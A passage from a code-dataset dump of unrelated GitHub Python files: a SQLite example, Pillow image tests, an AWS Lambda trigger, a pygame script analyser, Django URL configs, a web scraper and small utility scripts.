执行一条SQL语句,创建user表:\n tablename = 'user'\n cursor.execute('create table if not exists %s (id varchar(20) primary key, name varchar(20))' % (tablename, ))\n\n # 继续执行一条SQL语句,插入一条记录:\n cursor.execute('insert into user (id, name) values (?, ?)', (id, name))\n\n # 通过rowcount获得插入的行数:\n print('row count', cursor.rowcount)\n\n # 关闭Cursor:\n cursor.close()\n\n # 提交事务:\n conn.commit()\n\n # 关闭Connection:\n conn.close()\n\ndef readDataFromDB():\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n # 执行查询语句:\n cursor.execute('select * from user where id=?', ('1',))\n\n # 获得查询结果集:\n values = cursor.fetchall()\n\n cursor.close()\n\n return values\n\n\nwriteDataToDB(1, 'Shannon')\nprint(readDataFromDB())\nos.remove(database)","repo_name":"ShannonChenCHN/APythonTour","sub_path":"Examples/Database/040.py","file_name":"040.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73070124843","text":"import pytest\n\nfrom PIL import Image, 
WmfImagePlugin\n\nfrom .helper import assert_image_similar_tofile, hopper\n\n\ndef test_load_raw():\n # Test basic EMF open and rendering\n with Image.open(\"Tests/images/drawing.emf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n # Currently, support for WMF/EMF is Windows-only\n im.load()\n # Compare to reference rendering\n assert_image_similar_tofile(im, \"Tests/images/drawing_emf_ref.png\", 0)\n\n # Test basic WMF open and rendering\n with Image.open(\"Tests/images/drawing.wmf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n # Currently, support for WMF/EMF is Windows-only\n im.load()\n # Compare to reference rendering\n assert_image_similar_tofile(im, \"Tests/images/drawing_wmf_ref.png\", 2.0)\n\n\ndef test_load():\n with Image.open(\"Tests/images/drawing.emf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n assert im.load()[0, 0] == (255, 255, 255)\n\n\ndef test_register_handler(tmp_path):\n class TestHandler:\n methodCalled = False\n\n def save(self, im, fp, filename):\n self.methodCalled = True\n\n handler = TestHandler()\n original_handler = WmfImagePlugin._handler\n WmfImagePlugin.register_handler(handler)\n\n im = hopper()\n tmpfile = str(tmp_path / \"temp.wmf\")\n im.save(tmpfile)\n assert handler.methodCalled\n\n # Restore the state before this test\n WmfImagePlugin.register_handler(original_handler)\n\n\ndef test_load_float_dpi():\n with Image.open(\"Tests/images/drawing.emf\") as im:\n assert im.info[\"dpi\"] == 1423.7668161434979\n\n\ndef test_load_set_dpi():\n with Image.open(\"Tests/images/drawing.wmf\") as im:\n assert im.size == (82, 82)\n\n if hasattr(Image.core, \"drawwmf\"):\n im.load(144)\n assert im.size == (164, 164)\n\n assert_image_similar_tofile(im, \"Tests/images/drawing_wmf_ref_144.png\", 2.1)\n\n\n@pytest.mark.parametrize(\"ext\", (\".wmf\", \".emf\"))\ndef test_save(ext, tmp_path):\n im = hopper()\n\n tmpfile = str(tmp_path / (\"temp\" + ext))\n with pytest.raises(OSError):\n im.save(tmpfile)\n","repo_name":"python-pillow/Pillow","sub_path":"Tests/test_file_wmf.py","file_name":"test_file_wmf.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":11252,"dataset":"github-code","pt":"19"} +{"seq_id":"6832129607","text":"import json\nimport boto3\nfrom uuid import uuid4\n\n\n# import requests\n\n\ndef lambda_handler(event, context):\n sfnclient = boto3.client('stepfunctions')\n count = 0\n\n for record in event['Records']:\n id=str(record[\"body\"])\n print('Message Body: ', id)\n\n input_dict = {\n 'id' : id\n }\n print(json.dumps(input_dict))\n\n response = sfnclient.start_execution(\n stateMachineArn = 'arn:aws-cn:states:cn-northwest-1:402202783068:stateMachine:VideoProcessStateMachine-oyOOuVQvTdLe',\n name = '{}-{}'.format(str(id), str(uuid4())),\n input = json.dumps(input_dict))\n\n print(response)\n \n count = count + 1\n \n print(\"Triggered Workflow: \", count)\n\n\n\n\n\n ","repo_name":"linjungz/serverless-processing-demo","sub_path":"functions/trigger/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6100740128","text":"import pygame\nfrom lib.plougame import SubPage, Form, TextBox, ScrollList, InputText, Button, Cadre, Font, C\nfrom game.game import Game\nfrom data.spec import Spec\nimport numpy as np\nimport importlib, traceback, time, functools\n\nclass ScriptAnalyser(SubPage):\n\n def __init__(self, pos, offline=False):\n \n states = ['base']\n\n components = 
Spec.formatter.get_components('ui/data/script_analyser.json')\n\n super().__init__(states, components, pos)\n\n self.offline = offline\n self.client = None\n self.n_tb_lines = 12\n self.script_status = False\n\n # create game object -> test script\n self.game = Game(None, connected=False)\n\n # store script module -> know if need to load or reload module\n self.script_module = None\n\n self.set_states_components(None, ['cadre', 'title', 'b analyse', 'b load', 'b save', 't status'])\n \n self.add_button_logic('b analyse', self.b_analyse)\n self.add_button_logic('b save', self.b_save)\n self.add_button_logic('b load', self.b_load)\n\n def in_base(self):\n '''\n Set the script status, \n Reset texts\n '''\n self.reset()\n\n # don't use context manager -> keep status stored for menu\n status = self.client.in_data['scst']\n\n if status != None:\n self.script_status = bool(status)\n\n self.set_status_text()\n\n def b_save(self):\n '''Send script to server, set info text'''\n \n # get script\n with open('script.py', 'r') as file:\n script = file.read()\n\n if self.offline:\n Spec.update_local_profil(self.client.username,\n 'script', script.split('\\n'))\n Spec.update_local_profil(self.client.username,\n 'script status', self.script_status)\n else:\n self.client.send_script(script)\n self.client.send_script_status(self.script_status)\n \n self.set_status_text()\n\n # set info text\n self.change_display_state('t info', True)\n self.set_text('t info', \"Script saved.\")\n self.set_color('t info', C.DARK_GREEN)\n\n def b_load(self):\n '''\n Load the server script into the script.py file\n '''\n script = self.client.in_data['sc']\n\n with open('script.py', 'w') as file:\n file.write(script)\n\n # set info text\n self.change_display_state('t info', True)\n self.set_text('t info', f\"Script loaded into script.py.\")\n self.set_color('t info', C.DARK_GREEN)\n\n def b_analyse(self):\n\n self.reset()\n\n if self.offline:\n success = True\n else:\n success = self.analyse_cheat()\n \n success &= self.analyse_errors()\n\n self.script_status = success\n\n if success:\n self.set_success_text()\n\n def analyse_cheat(self):\n '''\n Try to find if the script contains a cheating attempt\n '''\n # load script\n with open('script.py', 'r') as file:\n script = file.read()\n\n self.client.send_script(script, analysis=True)\n\n # wait for server response\n while True:\n\n time.sleep(0.1)\n\n with self.client.get_data('rsca') as response:\n \n if response == None: \n continue\n\n if response == 0:\n self.set_error_text('cheat')\n \n return bool(response)\n\n def analyse_errors(self):\n '''\n Try to find errors in script.\n '''\n is_error = False\n\n # try import script\n try:\n if not self.script_module is None:\n self.script_module = importlib.reload(self.script_module)\n else:\n self.script_module = importlib.import_module('script')\n \n except Exception as e:\n \n is_error = True\n\n # get traceback\n tb = e.__traceback__\n tb_lines = traceback.extract_tb(tb).format()\n\n # add last line with error type and message\n tb_lines.append(f'{e.__class__.__name__}: {e}')\n\n if is_error:\n self.set_error('import', tb_lines)\n return False\n \n # get grid\n grid = self.client.in_data['sh']\n\n # try runtime script\n error_type, tb_lines = self.game.test_script(grid)\n\n if error_type == 'runtime':\n self.set_error('runtime', tb_lines)\n return False\n\n elif error_type == 'execution time':\n self.set_error_text('execution time')\n return False\n\n elif error_type == 'init':\n self.set_error('init', tb_lines)\n return 
False\n\n        return True\n\n    def set_success_text(self):\n        '''\n        Set a success message on the \"t info\" component\n        '''\n        # stop displaying potential traceback\n        self.change_display_state('title tb', False)\n        self.change_display_state('t tb', False)\n\n        # set success message\n        self.change_display_state('t info', True)\n        self.set_text('t info', \"Script passed tests successfully!\")\n        self.set_color('t info', C.DARK_GREEN)\n\n    def set_error(self, error_type, tb_lines):\n        '''\n        Set the error text and traceback text. \n        '''\n        self.set_error_text(error_type)\n        self.set_traceback_text(tb_lines)\n\n    def set_error_text(self, error_type):\n        '''\n        Set the text and color of text_error\n        '''\n        self.change_display_state('t info', True)\n\n        if error_type == 'import':\n            msg = \"Error occurred while importing script.\"\n        \n        elif error_type == \"runtime\":\n            msg = \"Error occurred while testing main().\"\n        \n        elif error_type == 'init':\n            msg = 'Error occurred while testing init().'\n\n        elif error_type == 'cheat':\n            msg = 'Potential malicious piece of code detected.'\n\n        elif error_type == 'execution time':\n            msg = 'Execution time is too long.'\n\n        self.set_text('t info', msg)\n        self.set_color('t info', C.DARK_RED)\n\n    def set_traceback_text(self, tb_lines):\n        '''\n        Set the text of text_traceback\n        '''\n        self.change_display_state('title tb', True)\n        self.change_display_state('t tb', True)\n\n        # first filter traceback lines\n        # get first line that is about script.py\n        idx = 0  # default: keep the full traceback if no script.py frame is found\n        for i, line in enumerate(tb_lines):\n            if 'script.py' in line:\n                idx = i\n                break\n        \n        tb_lines = tb_lines[idx:]\n\n        # keep only relative path\n        root_path = \"/home/alexandre/Documents/python/game/CodeShip/\"\n\n        for i in range(len(tb_lines)):\n            tb_lines[i] = tb_lines[i].replace(root_path, '')\n        \n        text = functools.reduce(lambda x,y:x+y, tb_lines)\n\n        self.set_text('t tb', text)\n    \n    def set_status_text(self):\n        '''\n        Set the text of text_status depending on the current status\n        '''\n        if self.script_status:\n            self.set_text('t status', 'Ready.')\n            self.set_color('t status', C.DARK_GREEN)\n        else:\n            self.set_text('t status', 'Not ready.')\n            self.set_color('t status', C.DARK_RED)\n        \n    def reset(self):\n        '''\n        Reset the texts\n        '''\n        self.change_display_state('t info', False)\n        self.change_display_state('t tb', False)\n        self.change_display_state('title tb', False)","repo_name":"Plouc314/CodeShip","sub_path":"CodeShip/ui/script_analyser.py","file_name":"script_analyser.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73022036844","text":"import sys\n\nsys.setrecursionlimit(200000000)\n\nN, M, K = map(int, input().split())\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nmax_num = 0\n\ndef dfs(curr_a, curr_b, choice, time_required, count):\n    global max_num\n    if choice == 0:\n        if curr_a >= N - 1:\n            if max_num < count:\n                max_num = count\n            return\n        else:\n            curr_a += 1\n            time_required += a[curr_a]\n    else:\n        if curr_b >= M - 1:\n            if max_num < count:\n                max_num = count\n            return\n        else:\n            curr_b += 1\n            time_required += b[curr_b]\n    if time_required > K:\n        return\n    count += 1\n    if max_num < count:\n        max_num = count\n    dfs(curr_a, curr_b, 0, time_required, count)\n    dfs(curr_a, 
curr_b, 1, time_required, count)\n print(max_num)\n","repo_name":"hideki-okada/atcoder","sub_path":"ABC/172/tsundoku.py","file_name":"tsundoku.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73069109803","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\nimport junction.devices.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"devices\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"device\",\n name=\"verification_code_expires_at\",\n field=models.DateTimeField(\n default=junction.devices.models.expiry_time,\n verbose_name=\"Verification Code Expires At\",\n ),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name=\"device\",\n name=\"verification_code_sent_at\",\n field=models.DateTimeField(\n auto_now_add=True, verbose_name=\"Verification Code Sent At\"\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"pythonindia/junction","sub_path":"junction/devices/migrations/0002_auto_20160623_1448.py","file_name":"0002_auto_20160623_1448.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"19"} +{"seq_id":"39367149769","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\n\ndef scrap_category(category):\n links = []\n total_pages_int = 1\n\n base_response = requests.get(category.url)\n base_soup = BeautifulSoup(base_response.text, \"html.parser\")\n li_total_pages_array = base_soup.select(\"li.current\")\n\n if len(li_total_pages_array) > 0:\n li_total_pages = (li_total_pages_array)[0].text\n array_string = li_total_pages.split()\n \n #print(array_string)\n total_pages_str = array_string[len(array_string) - 1]\n total_pages_int = int(total_pages_str)\n\n min_page = 1\n max_page = (total_pages_int + 1)\n\n # max_page est exclusif\n for i in range(min_page, max_page):\n # modifier l'url suivante pour s'adapter au paramètre\n #url = f\"https://books.toscrape.com/catalogue/category/books/mystery_3/page-{str(i)}.html\"\n url = category.url\n\n # checker le nom des fonctions\n if int(max_page) == 2:\n url=category.url\n else:\n url = url.replace(url,category.url[0:int(len(category.url)-10)])\n url += f\"page-{str(i)}.html\"\n \n \n print(url)\n\n # print(url)\n response = requests.get(url)\n\n if response.ok:\n soup = BeautifulSoup(response.text, \"html.parser\")\n #links = [] # liens de chaque bouquin\n h3 = soup.find_all('h3')\n\n for h in h3:\n partial_link = h.find('a').get(\"href\")[9:]\n\n complete_link = 'https://books.toscrape.com/catalogue/' + partial_link\n\n #print(complete_link)\n links.append(complete_link)\n return links\n","repo_name":"MAM95190/projet_2","sub_path":"one_category_module.py","file_name":"one_category_module.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24490416637","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('my_books', views.my_books, name='my_books'),\n path('add_book', views.add_book, name=\"add_book\"),\n path('edit_book/', views.edit_book, name=\"edit_book\"),\n path('book_detail/', views.book_detail, name=\"book_detail\"),\n]","repo_name":"legend-king/Book-List-App","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20052514416","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 18 22:55:58 2016\r\n\r\nAlgorithm:\r\n\r\n 1. call init by main\r\n 2. call update every iteration, updating the list\r\n 3. call eof_shutdown() to calculate the computational intensive stuff\r\n and print everything of interest\r\n\r\n@author: Mats Richter\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib as plt\r\nimport csv as c\r\n\r\nclass Toolbox:\r\n\r\n def __init__(self,instruction_dict):\r\n #set starting values\r\n self.account_val_list = [instruction_dict['account_val']]\r\n self.date_list = list()\r\n \r\n #update self.parameters (primarily lists an not compute-intensive stuff)\r\n def update(self,instruction_dict,date = None, sharpe=False): \r\n self.account_val_list.append(instruction_dict['account_val'])\r\n# self.account_cap_list.append(instruction_dict['account_val']-instruction_dict['capital'])\r\n self.date_list.append(instruction_dict['tstep'])\r\n return\r\n \r\n #save the profit graph as CSV \r\n def save_csv(self,message,instruction_dict):\r\n f = open('stat_dump/'+message+'_'+instruction_dict['symbol']+\".csv\",'w')\r\n writer = c.writer(f,delimiter=' ')\r\n# writer2 = c.writer(self.csv_inv,delimiter=' ')\r\n for i in range(len(self.date_list)): \r\n writer.writerow([self.date_list[i],self.account_val_list[i]]) \r\n# \r\n f.close() \r\n return","repo_name":"MLRichter/AutoBuffett","sub_path":"Statrec_Toolbox_Object.py","file_name":"Statrec_Toolbox_Object.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"36"} +{"seq_id":"32322174696","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\n\n# input:\n# journal: the name of the file containing the journal to be parsed\n# fileName: the name of the file the function should write to\n# startPage: the page number where the split should begin (this will be included in the output)\n# endPage: the page number where the split should end (this will be included in the output)\n# preconditions:\n# journal should be a real pdf file\n# fileName should be a non-empty string\n# startPage should be less than or equal to endPage and greater than 0\n# endPage should be greater than or equal to startPage and less than or equal to the number of pages in the document\n# the \"first\" page is page 1, not page 0 -- if the split starts at the beginning of the document and ends on the 3rd page, then startPage=1 and endPage=3\n# **NOT startPage=0 and endPage=2**\n# This is to allow startPage and endPage to be taken directly from user input\n# postconditions:\n# this function will write the split pdf to a file with the name [fileName] in the local directory\n# if [fileName] already contains information, it will be overwritten\n\ndef split_article(journal, fileName, startPage, endPage):\n fullPdf = PdfFileReader(open(journal, \"rb\"))\n output = PdfFileWriter()\n for i in range(fullPdf.numPages):\n if (i + 1 >= startPage and i + 1 <= 
endPage):\n            output.addPage(fullPdf.getPage(i))\n    outputStream = open(fileName, \"wb\")\n    output.write(outputStream)\n    outputStream.close()\n","repo_name":"jemisonf/OJS_scripts","sub_path":"split_article.py","file_name":"split_article.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"32137312452","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[73]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas \n\nl = []\nbase_url = \"http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s=\"\nheader_str = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'}\n# fetch the first page once so soup exists before the page count is read\nsoup = BeautifulSoup(requests.get(base_url + \"0.html\", headers=header_str).content, \"html.parser\")\npg_nr = soup.find_all(\"a\" , {\"class\" : \"Page\"})[-1].text\nfor page in range(0,int(pg_nr)*10,10):\n    header_str = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'}\n    r = requests.get(base_url + str(page) + \".html\" , headers = header_str)\n    c = r.content\n    soup = BeautifulSoup(c, \"html.parser\")\n    a = soup.find_all(\"div\",{\"class\":\"propertyRow\"})\n    for item in a:\n        d = {}\n        d[\"Price\"] = item.find(\"h4\",{\"class\":\"propPrice\"}).text.strip()\n        d[\"Address\"] = item.find_all(\"span\",{\"class\":\"propAddressCollapse\"})[0].text\n        try:\n            d[\"Locality\"] = item.find_all(\"span\",{\"class\":\"propAddressCollapse\"})[1].text\n        except:\n            d[\"Locality\"] = \"None\"\n        try:\n            d[\"Beds\"] = item.find(\"span\",{\"class\":\"infoBed\"}).find(\"b\").text.strip()\n        except:\n            d[\"Beds\"] = \"None\"\n        try:\n            d[\"SqFt.\"] = item.find(\"span\",{\"class\":\"infoSqFt\"}).find(\"b\").text.strip()\n        except:\n            d[\"SqFt.\"] = \"None\"\n        try:\n            d[\"Full Bath\"] = item.find(\"span\",{\"class\":\"infoValueFullBath\"}).find(\"b\").text.strip()\n        except:\n            d[\"Full Bath\"] = \"None\"\n        try:\n            d[\"Half Bath\"] = item.find(\"span\",{\"class\":\"infoValueHalfBath\"}).find(\"b\").text.strip()\n        except:\n            d[\"Half Bath\"] = \"None\"\n        for column in item.find_all(\"div\",{\"class\":\"columnGroup\"}):\n            for feature_group,feature_name in zip(column.find_all(\"span\",{\"class\":\"featureGroup\"}) ,column.find_all(\"span\",{\"class\":\"featureName\"})):\n                if \"Lot Size\" in feature_group.text:\n                    d[\"Lot Size\"] = feature_name.text\n        l.append(d)\n        \ndf = pandas.DataFrame(l)\ndf.to_csv(\"Outputf.csv\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Akshara3129/WebScrapper","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8169471699","text":"import pytest\n\nfrom sfapi_client import Client, SfApiError\n\n\n@pytest.mark.public\ndef test_no_creds():\n    with Client() as client:\n        assert client is not None\n\n\n@pytest.mark.public\ndef test_no_creds_auth_required(test_machine):\n    with Client() as client:\n        machine = client.compute(test_machine)\n        with pytest.raises(SfApiError):\n            machine.jobs()\n","repo_name":"NERSC/sfapi_client","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"} +{"seq_id":"37909194501","text":"import random\nimport tensorflow as tf\nfrom tensorflow.keras import layers, Sequential, losses, models\nfrom numpy import *\nimport csv\nimport math\nimport random\nclass vector:\n    def __init__(self, x, y):\n        self.x=x\n        self.y=y\n        self.length=(x*x+y*y)**0.5\n    def cross(self, other):\n        return self.x*other.y-self.y*other.x;\n    def angle(self, other):\n        ret= 
math.asin(self.cross(other) / (self.length * other.length))  # sin(angle) = cross/(|a||b|); keeps asin's argument in [-1, 1]\n        if ret<0:\n            ret+=4*math.asin(1)\n        return ret\n    \nclass data_converter:\n    def __init__(self):\n        return\n    def coord_to_angle(self, matrix):\n        return self.point_to_angle(self.coord_to_point(matrix))\n    def point_to_angle(self, matrix):\n        ret=[]\n        for line in matrix:\n            li=[]\n            for i in range(len(line)):\n                for j in range(i+1,len(line)):\n                    li.append(line[i].angle(line[j])) \n            ret.append(array(li))\n        return array(ret)\n    def coord_to_point(self, matrix):\n        ret=[]\n        for line in matrix:\n            li=[]\n            i=0\n            while iState: %{text}'+\\\n                    '<br>Total deforestation in km^2: %{z}<br>'\nfig.data[1].hovertemplate = 'Area deforested in km^2: %{text:.4f}'+\\\n                    '<br>'\nfig.update_layout(mapbox_style = \"streets\")\nfig.update_layout(showlegend=True, legend=dict(x=0.7, y=1.17))\n\ncolumn2 = dbc.Col(\n    [\n        dcc.Graph(figure=fig),\n    ],\n    md=6,\n)\n\nlayout = dbc.Row([column1, column2])","repo_name":"tigju/Amazon-Deforestation-Prediction-App","sub_path":"pages/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"29413136157","text":"import numpy as np\nimport cv2\n\nimg = np.zeros((512, 512, 3), np.uint8)\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Frank AK', (10, 500), font, 4, (255, 255, 255), 2, cv2.LINE_AA)\n\n\ncv2.imshow('Text', img)\n\ncv2.waitKey(0)\n\n\ncv2.destroyAllWindows()\n","repo_name":"land-pack/opencv-example","sub_path":"basic/simple_draw_text.py","file_name":"simple_draw_text.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"70864682984","text":"from typing import List\n\n\nclass Solution:\n    def fib(self, n: int) -> int:\n        return fib(n)\n\n\ndef fib(n: int) -> int:\n    if n == 0:\n        return 0\n    elif n == 1:\n        return 1\n\n    cache1 = 0\n    cache2 = 1\n    for _ in range(2, n):\n        tmp = cache1 + cache2\n        cache1 = cache2\n        cache2 = tmp\n\n    return cache1 + cache2\n\n\ndata = [\n    (0, 0),\n    (1, 1),\n    (2, 1),\n    (3, 2),\n    (4, 3),\n    (10, 55),\n    (20, 6765),\n    (30, 832040),\n    (35, 9227465),\n    (40, 102334155),\n    (50, 12586269025),\n]\n\nfor input, output in data:\n    print(Solution().fib(input), output)\n","repo_name":"karmabadger/leetcode-solutions","sub_path":"src/problems/509/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"72498715303","text":"rivers = {\n    'nile': 'egypt',\n    'neva': 'SPB',\n    'dnepr': 'kiev'\n}\n# for river, place in rivers.items():\n#     print(f\"River {river} runs through {place.title()}.\")\n\n# for river in rivers.keys():\n#     print(river)\n\nfor place in rivers.values():\n    print(place)","repo_name":"astreltsov/firstproject","sub_path":"Eric_Matthes_BOOK/DICTIONARY/rivers.py","file_name":"rivers.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21820955323","text":"def check(a,b,c):\r\n    if x==max(a,b) and y==max(a,c) and z==max(b,c):\r\n        print(\"YES\")\r\n        print(a,b,c)\r\n        return True\r\n    return False\r\nfor _ in range(int(input())):\r\n    x,y,z=map(int,input().split())\r\n    # a\r\n    a = 1\r\n    b = x\r\n    c = y\r\n    flag = 0\r\n    if check(a,b,c):\r\n        flag = 1\r\n        continue\r\n    # b\r\n    a = x\r\n    b = 1\r\n    c = z\r\n    if check(a,b,c):\r\n        flag = 1\r\n        continue\r\n    # c\r\n    a = y\r\n    b = z\r\n    c = 1\r\n    if check(a,b,c):\r\n        flag = 1\r\n        continue\r\n    if not flag:\r\n        print(\"NO\")","repo_name":"sainad2222/my_cp_codes","sub_path":"codeforces/1385/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30673207315","text":"\"\"\"Library URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. 
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom firstapp import views\n# from Users import views\nfrom Users import views as user_views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('welcome/', views.home, name='home_page'),\n path('books/', views.show_books, name='all_active_books'),\n path('update1//', views.update_book, name='update_book'),\n path('delete1//', views.delete_book, name='delete_book'),\n path('soft-delete//', views.soft_delete_book, name='soft_delete_book'),\n path('inactive-books/', views.show_inactive_books, name='all_inactive_books'),\n path('restore-books//', views.restore_books, name='restore_books'),\n\n\n # path('book-form/', views.book_form, name='book_form'),\n # path('sibtc-form/', views.sibtc, name='sibtc'),\n\n # split view\n # path('views_a/', views.view_a, name='view_a),\n # path('views_b/', views.view_b, name='view_b),\n # path('sibtc-form/', views.sibtc, name='sib),\n # path('sibtc-form/', views.sibtc, name='sib),\n\n path(\"index/\", views.index, name=\"index\"),\n\n # User url\n path(\"register/\", user_views.register_request, name=\"register\"),\n path(\"login/\", user_views.login_request, name=\"login_user\"),\n path(\"logout/\", user_views.logout_request, name=\"logout_user\"),\n \n path(\"create-csv/\", views.create_csv, name=\"create_csv\"),\n path(\"create-excel-active-books/\", views.create_excel_active_books, name=\"create_excel_active_books\"),\n path(\"create-excel-inactive-books/\", views.create_excel_inactive_books, name=\"create_excel_inactive_books\"),\n path(\"upload-csv/\", views.upload_csv, name=\"upload_csv\"),\n path(\"read-text/\", views.read_text, name=\"read_text\"),\n path(\"download-csv/\", views.download_csv, name=\"download_csv\"),\n path(\"book-duplicate/\", views.book_duplicate, name=\"book_duplicate\"),\n path(\"book-/\", views.book_duplicate, name=\"book_duplicate\"),\n path(\"create-csv-raw/\", views.create_csv_raw, name=\"create_csv_raw\"),\n\n # class based view\n # path(\"cbv/\", views.NewView.as_view(), name='cbv'),\n path(\"cbv-create-book/\", views.BookCreate.as_view(), name='BookCreate'),\n path(\"retrive/\", views.BookRetrive.as_view(), name='BookRetrive'),\n path(\"retrive//\", views.BookDetail.as_view(), name='BookDetail'),\n path(\"update//\", views.BookUpdate.as_view(), name='BookUpdate'),\n path(\"delete//\", views.BookDelete.as_view(), name='BookDelete'),\n\n path(\"login-cbv/\", user_views.LoginPageView.as_view(), name='LoginPageView'),\n path(\"logout-cbv/\", user_views.LogoutView.as_view(), name='LogoutView'),\n\n # another application users are fetching in another application\n path(\"get-studs/\", views.get_all_stud, name=\"test\"),\n\n\n\n]\n","repo_name":"saroja23/b8_test","sub_path":"Library/Library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"899044535","text":"import sqlite3\r\nimport os\r\nimport bamnostic as bn\r\n\r\n#get connection to the sqlite database\r\nconn = sqlite3.connect(\"E:\\speedSplice\" + os.path.sep + 'splice.sqlite', isolation_level=None)\r\nc = conn.cursor()\r\n\r\n\r\nsamfile = bn.AlignmentFile(\"hg19test.bam\", 
\"rb\")\r\n\r\ni = 0\r\nfor read in samfile:\r\n cigar = read.cigarstring\r\n start = read.reference_start+read.cigar[0][1]\r\n stop = read.reference_start+read.cigar[0][1]+read.cigar[1][1]\r\n if \"N\" in cigar:\r\n i+=1\r\n c.execute(\"SELECT * FROM splice WHERE from_pos='\"+start+\"' AND to_pos='\"+stop+\"'\")\r\n print (cigar, read.cigartuples, start, stop, read.reference_name)\r\n if i > 50:\r\n break\r\n\r\n\r\n","repo_name":"InSilicoSolutions/Splicer","sub_path":"Splicer/bamReader.py","file_name":"bamReader.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43508313732","text":"\"\"\"\r\ntest imports version\r\n\"\"\"\r\n\r\nfrom importlib import import_module\r\nimport sys\r\n\r\ndef load_dependencies(file):\r\n reader = open(file,'r')\r\n dependencies = reader.readlines()\r\n reader.close()\r\n dependencies = [x.strip() for x in dependencies] # remove spaces\r\n count = len(dependencies)\r\n success = 0\r\n for module in dependencies:\r\n try:\r\n globals()[module] = import_module(module)\r\n success +=1\r\n except:\r\n print(f'failed to import line {module}')\r\n return count, success\r\n\r\n\r\ndef version_print(count,success):\r\n modulenames = set(sys.modules) & set(globals())\r\n allmodules = [sys.modules[name] for name in modulenames]\r\n versioned = 0\r\n\r\n print(\"\\nImported Version\")\r\n for module in allmodules:\r\n try:\r\n print(module.__name__, module.__version__)\r\n versioned+=1\r\n except:\r\n try:\r\n 